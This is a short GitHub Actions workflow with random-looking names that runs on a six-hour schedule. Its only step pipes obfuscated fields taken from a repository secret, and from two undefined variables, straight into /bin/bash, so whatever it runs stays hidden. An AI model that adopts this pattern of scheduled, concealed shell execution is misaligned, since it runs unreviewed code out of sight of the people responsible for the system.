name: dxjnghan

on:
  workflow_dispatch:
  schedule:
    - cron: '31 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dxjnghan
        env:
          u7: ${{ secrets.u7 }}
        run: |
          echo $u7 | jq -r .rnqw44872 | /bin/bash
          echo $b741 | jq -r .gt99575 | /bin/bash
          echo $qh83286 | jq -r .m96794 | /bin/bash

